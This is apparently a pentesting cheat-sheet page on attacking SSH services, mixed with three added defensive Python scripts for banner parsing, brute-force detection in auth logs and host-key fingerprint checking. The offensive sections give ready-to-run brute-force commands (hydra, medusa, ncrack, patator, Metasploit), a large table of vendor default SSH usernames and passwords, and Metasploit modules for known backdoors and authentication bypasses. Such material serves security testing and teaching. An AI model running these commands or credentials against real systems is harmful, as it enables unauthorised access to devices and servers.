SSH
SSH usually uses port 22
What is SSH?
SSH, or Secure Shell, is a network communication protocol that enables two computers to communicate and share data (cf. HTTP, the Hypertext Transfer Protocol, which is used to transfer hypertext such as web pages). An inherent feature of SSH is that the communication between the two computers is encrypted, which makes it suitable for use on insecure networks.
```text
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
```
SSH Working Principle
The protocol works in the client-server model, which means that the connection is established by the SSH client connecting to the SSH server. The SSH client drives the connection setup process and uses public key cryptography to verify the identity of the SSH server. After the setup phase the SSH protocol uses strong symmetric encryption and hashing algorithms to ensure the privacy and integrity of the data that is exchanged between the client and server.
The figure below presents a simplified setup flow of a secure shell connection.
[Figure: client to SSH server connection setup flow]
SSH Pentesting
| Shodan search query |
|---|
| port:22 |
| openssh -port:22 |
Banner Grabbing
```text
telnet 10.10.x.x 22
nc -nv 10.10.x.x 22
scanssh -p -r -e excludes 10.10.x.x/24 # https://www.monkey.org/~provos/scanssh/ (-e: file of hosts to exclude)
#Metasploit Framework:
msf > use auxiliary/scanner/ssh/ssh_version
msf > use auxiliary/scanner/ssh/detect_kippo # This module will detect if an SSH server is running a Kippo honeypot
#Nmap Scripts:
nmap -sC -p22 10.10.x.x # Run the default nmap scripts for SSH
nmap -sV -p22 10.10.x.x # Retrieve version
nmap -p22 10.10.x.x --script ssh2-enum-algos # Retrieve supported algorithms
nmap -p22 10.10.x.x --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve the server's host keys in full
nmap -p22 10.10.x.x --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods
```
[Figure: SSH banner grabbing with the nmap banner script]
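The banner these tools print is the server's identification string from RFC 4253 (`SSH-protoversion-softwareversion SP comments`), which is also the first message of the connection setup described above. The following Python script is an added example (not from the original page or any tool it mentions) that parses such a banner into its fields, extracts the OpenSSH version, and flags servers still advertising protocol 1; the sample banners are constructed, and `grab_banner` is a hypothetical helper for reading the string from a live host.

```python
import re
import socket

# RFC 4253, section 4.2: the server's identification string has the form
#   SSH-protoversion-softwareversion SP comments CR LF
# and may be preceded by other lines that do not start with "SSH-", which
# the client must ignore. This is what an nc/telnet banner grab returns.
BANNER_RE = re.compile(r"^SSH-(?P<proto>[0-9.]+)-(?P<software>\S+)(?: (?P<comments>.*))?$")

# Constructed sample banners (not captured from any real host); the first one
# mirrors the nmap output quoted earlier on this page.
SAMPLE_BANNERS = [
    "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\r\n",
    "SSH-1.99-Cisco-1.25\r\n",
    "Welcome to the bastion. Unauthorised access prohibited.\r\nSSH-2.0-dropbear_2019.78\r\n",
]


def parse_banner(raw):
    """Return proto/software/comments from a raw banner, or None if no identification line is present."""
    for line in raw.replace("\r\n", "\n").split("\n"):
        m = BANNER_RE.match(line)
        if m:
            return {
                "proto": m.group("proto"),
                "software": m.group("software"),
                "comments": m.group("comments"),  # None when the server sends no comment field
            }
    return None


def openssh_version(info):
    """Pull the numeric version (e.g. '4.7p1') out of an OpenSSH software string; None for other servers."""
    if info is None:
        return None
    m = re.match(r"OpenSSH_([0-9]+\.[0-9]+(?:p[0-9]+)?)", info["software"])
    return m.group(1) if m else None


def advertises_protocol1(info):
    """True if the server still offers SSH protocol 1 ('1.99' means both 1 and 2 are supported)."""
    return info is not None and info["proto"].startswith("1.")


def grab_banner(host, port=22, timeout=5.0):
    """Hypothetical helper: read the identification string from a live server (not exercised offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        buf = b""
        while len(buf) < 4096:
            try:
                chunk = s.recv(1024)
            except socket.timeout:
                break
            if not chunk:
                break
            buf += chunk
            # Stop once a complete identification line has arrived.
            if b"SSH-" in buf and buf.endswith(b"\n"):
                break
    return buf.decode("utf-8", errors="replace")


if __name__ == "__main__":
    for raw in SAMPLE_BANNERS:
        info = parse_banner(raw)
        print(info, "openssh:", openssh_version(info), "protocol1:", advertises_protocol1(info))
```

The comment field is where Debian-style package suffixes such as `Debian-8ubuntu1` appear, so a version check should look at `software`, not at the whole line.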
Supported Authentication Methods (password, private key)
```shell
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=<username>" 10.10.x.x
```
[Figure: SSH authentication methods enumeration with the nmap script]
SSH Connection Tools
Linux & Mac
```shell
ssh username@10.10.x.x # If ssh is running on another port, the -p parameter should be used.
#IPv6 (the %9 suffix is the zone index of the local interface for a link-local address):
ssh username@fe80::b0ec:afd2:a932:252c%9
```
Windows:
- Putty
- Filezilla
- Winscp
SSH Credentials
SSH Brute Forcing
```text
#Metasploit ssh brute force
msf > use auxiliary/scanner/ssh/ssh_login
#Metasploit username enumeration with brute force
msf > use auxiliary/scanner/ssh/ssh_enumusers
#Nmap Brute Force
nmap -p 22 --script ssh-brute --script-args userdb=users.list,passdb=pass.list --script-args ssh-brute.timeout=4s 10.10.x.x
#Other Brute Forcing Methods
hydra -L users.txt -P passwords.txt ssh://10.10.x.x -t 8
medusa -t 2 -T2 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -H /root/Desktop/host.txt -n 22 -M ssh
ncrack -g CL=2 -U users.list -P passwords.list -iL targetIPs.list -p ssh:22 -oA Results.txt
patator ssh_login host=10.10.x.x user=FILE0 password=FILE1 0=users.list 1=passwords.list persistent=0 -x ignore:mesg='Authentication failed.'
./guess-who -l username -h 10.10.x.x -p 22 -2 < passwords.list # https://packetstormsecurity.com/groups/teso/guess-who-0.44.tgz
```
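Every tool above leaves the same trace on the target: a burst of `Failed password` lines from one source in sshd's auth log, sometimes followed by an `Accepted` line when a guess lands. The following Python script is an added example (not from the original page) of the detection logic a defender would run over that log: it parses OpenSSH auth-log lines, counts failures per source address in a sliding window, and raises a second, higher-priority alert when a success follows a run of failures. The log lines are constructed samples using RFC 5737 documentation addresses, and the year is assumed because syslog timestamps carry none.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH auth-log line shape (syslog prefix, then "Failed|Accepted <method> for [invalid user] <user> from <ip> port <n>").
LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[0-9a-fA-F.:]+) port \d+"
)

# Constructed sample log (not from a real system): one source guesses passwords for
# two minutes and finally succeeds as root; a legitimate user mistypes once, then
# logs in with a key; a CRON line shows that unrelated entries are skipped.
SAMPLE_LOG = """
Mar  3 10:15:01 bastion sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Mar  3 10:15:03 bastion sshd[2102]: Failed password for invalid user oracle from 203.0.113.5 port 51236 ssh2
Mar  3 10:15:04 bastion CRON[2103]: pam_unix(cron:session): session opened for user root by (uid=0)
Mar  3 10:15:05 bastion sshd[2104]: Failed password for root from 203.0.113.5 port 51238 ssh2
Mar  3 10:15:07 bastion sshd[2105]: Failed password for root from 203.0.113.5 port 51240 ssh2
Mar  3 10:15:09 bastion sshd[2106]: Failed password for root from 203.0.113.5 port 51242 ssh2
Mar  3 10:15:20 bastion sshd[2107]: Failed password for deploy from 198.51.100.7 port 40012 ssh2
Mar  3 10:15:25 bastion sshd[2108]: Accepted publickey for deploy from 198.51.100.7 port 40014 ssh2: ED25519 SHA256:placeholderfingerprint
Mar  3 10:15:41 bastion sshd[2109]: Accepted password for root from 203.0.113.5 port 51244 ssh2
""".strip().splitlines()


def parse_line(line, year=2024):
    """Parse one sshd auth line into a dict, or None for lines that are not login results.

    Syslog timestamps have no year, so one is assumed (parameter `year`).
    """
    line = " ".join(line.split())  # collapse the padded day field ("Mar  3")
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m.group("result"), "method": m.group("method"),
            "user": m.group("user"), "ip": m.group("ip")}


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60), success_after=3):
    """Return alerts: 'bruteforce' when failures from one IP reach `threshold` inside `window`,
    and 'success_after_failures' when an Accepted line follows >= `success_after` recent failures."""
    recent = defaultdict(deque)  # ip -> timestamps of failures still inside the window
    flagged = set()              # IPs already reported as brute forcing (report once)
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev["ip"]]
        while q and ev["ts"] - q[0] > window:
            q.popleft()
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["ip"] not in flagged:
                flagged.add(ev["ip"])
                alerts.append({"type": "bruteforce", "ip": ev["ip"],
                               "failures": len(q), "last": ev["ts"]})
        elif len(q) >= success_after:
            # A successful login right after a burst of failures is the case worth paging on.
            alerts.append({"type": "success_after_failures", "ip": ev["ip"], "user": ev["user"],
                           "method": ev["method"], "preceding_failures": len(q), "ts": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The thresholds are deliberately parameters: on an internet-facing bastion a window of a minute with five failures is noisy but workable, while the success-after-failures rule is low-volume enough to alert on directly.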
SSH Default Credentials for Vendors
| Vendor | Username | Password |
|---|---|---|
| APC | apc, device | apc |
| Brocade | admin | admin123, password, brocade, fibranne |
| Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
| Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler |
| D-Link | admin, user | private, admin, user |
| Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin |
| EMC | admin, root, sysadmin | EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc |
| HP/3Com | admin, root, vcx, app, spvar, manage, hpsupport, opc_op | iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin |
| Huawei | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123 |
| IBM | USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer | PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer |
| Juniper | netscreen | netscreen |
| NetApp | admin | netapp123 |
| Oracle | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changeme, ilom-admin, ilom-operator, welcome1, oracle |
| VMware | vi-admin, root, hqadmin, vmware, admin | vmware, vmw@re, hqadmin, default |
Vulnerabilities
Specific Vulnerabilities and Exploits
```text
#Fortinet SSH backdoor [CVE-2016-1909]
msf > use auxiliary/scanner/ssh/fortinet_backdoor
#Juniper SSH backdoor [CVE-2015-7755]
msf > use auxiliary/scanner/ssh/juniper_backdoor
#F5 BIG-IP < 9.4.8-HF5, 10.2.4, 11.0.0-HF2, 11.1.0-HF3; Enterprise Manager < 2.1.0-HF2, 2.2.0-HF1, 2.3.0-HF3 [CVE-2012-1493]
msf > use exploit/linux/ssh/f5_bigip_known_privkey
#Freesshd <= 1.2.6 / Windows (Universal) [CVE-2012-6066]
msf > use exploit/windows/ssh/freesshd_authbypass
#FreeBSD OpenSSH 3.5p1
Exploit-DB: 17462.txt
```
Some Tips
List of some static Host and Authentication keys: GitHub - rapid7/ssh-badkeys (https://github.com/rapid7/ssh-badkeys): A collection of static SSH keys (public and private) that have made their way into software and hardware products.
The keys of the previously connected servers can be listed on the compromised computer.
```shell
# Fetch the public host keys the target currently presents (compare against ~/.ssh/known_hosts entries).
ssh-keyscan -t rsa,dsa,ecdsa,ed25519 -p 22 10.10.x.x
```
[Figure: host keys of the previously connected servers on the compromised computer]
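Both tips above come down to comparing host-key fingerprints: against what a client has pinned in `known_hosts`, and against the static keys collected in rapid7/ssh-badkeys. The following Python script is an added example (not from the original page, nor from the ssh-badkeys project) that parses `ssh-keyscan`/`known_hosts` lines, computes the `SHA256:` fingerprint exactly as `ssh-keygen -lf` prints it (plus the older colon-separated MD5 form), and reports each scanned host as matching its pin, mismatching it, unpinned, or carrying a known-bad key. The sample key blob is constructed with the correct wire format but meaningless key bytes, and `10.10.x.x` is the page's placeholder host.

```python
import base64
import hashlib
import struct


def ssh_string(data):
    """Encode bytes as an SSH 'string' (4-byte big-endian length prefix + data), RFC 4251."""
    return struct.pack(">I", len(data)) + data


def read_ssh_string(blob, offset=0):
    """Decode an SSH 'string' at offset; returns (data, next_offset)."""
    (n,) = struct.unpack(">I", blob[offset:offset + 4])
    return blob[offset + 4:offset + 4 + n], offset + 4 + n


def parse_keyscan_line(line):
    """Parse one 'host keytype base64' line as printed by ssh-keyscan or stored in known_hosts.

    Comment lines (ssh-keyscan emits '# host:port banner' lines) and short lines give None.
    """
    parts = line.split()
    if len(parts) < 3 or parts[0].startswith("#"):
        return None
    host, keytype, blob = parts[0], parts[1], base64.b64decode(parts[2])
    embedded, _ = read_ssh_string(blob)
    # The key type is stored twice (as text and inside the blob); a mismatch means a mangled line.
    if embedded != keytype.encode():
        raise ValueError(f"{host}: line says {keytype} but blob says {embedded!r}")
    return {"host": host, "type": keytype, "blob": blob}


def fingerprint_sha256(blob):
    """Same format as ssh-keygen -lf: SHA256 of the key blob, base64 without '=' padding."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def fingerprint_md5(blob):
    """Legacy colon-separated MD5 form still shown by some older tools."""
    return "MD5:" + ":".join(f"{b:02x}" for b in hashlib.md5(blob).digest())


def check_pins(lines, pins, known_bad=frozenset()):
    """Compare scanned host keys against pinned fingerprints and a set of known-bad fingerprints.

    pins: {host: expected SHA256 fingerprint}; known_bad: SHA256 fingerprints of static/leaked keys
    (e.g. computed from a ssh-badkeys-style collection).
    Returns {host: 'known-bad' | 'match' | 'mismatch' | 'unpinned'}.
    """
    results = {}
    for line in lines:
        entry = parse_keyscan_line(line)
        if entry is None:
            continue
        fp = fingerprint_sha256(entry["blob"])
        if fp in known_bad:
            status = "known-bad"      # the key is a published static key: anyone can impersonate this host
        elif entry["host"] not in pins:
            status = "unpinned"
        elif pins[entry["host"]] == fp:
            status = "match"
        else:
            status = "mismatch"       # key changed since it was pinned: reinstall, or interception
        results[entry["host"]] = status
    return results


# Constructed sample: an ssh-ed25519 blob whose 32 key bytes are just 0..31. It is not a real key,
# only a stand-in with the right wire format so parsing and fingerprinting can be exercised offline.
CONSTRUCTED_BLOB = ssh_string(b"ssh-ed25519") + ssh_string(bytes(range(32)))
SAMPLE_KEYSCAN = [
    "# 10.10.x.x:22 SSH-2.0-OpenSSH_8.9",  # comment line in the shape ssh-keyscan prints
    "10.10.x.x ssh-ed25519 " + base64.b64encode(CONSTRUCTED_BLOB).decode(),
]

if __name__ == "__main__":
    expected = fingerprint_sha256(CONSTRUCTED_BLOB)
    print(check_pins(SAMPLE_KEYSCAN, {"10.10.x.x": expected}))
    print(check_pins(SAMPLE_KEYSCAN, {"10.10.x.x": expected}, known_bad={expected}))
```

Feeding real `ssh-keyscan` output into `check_pins` with the fingerprints from an inventory gives a quick inventory-wide check for changed or factory-default host keys.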
Running a command over SSH with a key
```shell
ssh -o PasswordAuthentication=no -o BatchMode=yes -v -p 22 -i key -l username 10.10.x.x 'command'
```
SFTP Tunneling
```shell
# Local port forward: connections to localhost:<local-port> are tunnelled through the SSH session to <remote-port> on 10.10.x.x
sudo ssh -L <local-port>:10.10.x.x:<remote-port> -N -f username@10.10.x.x
```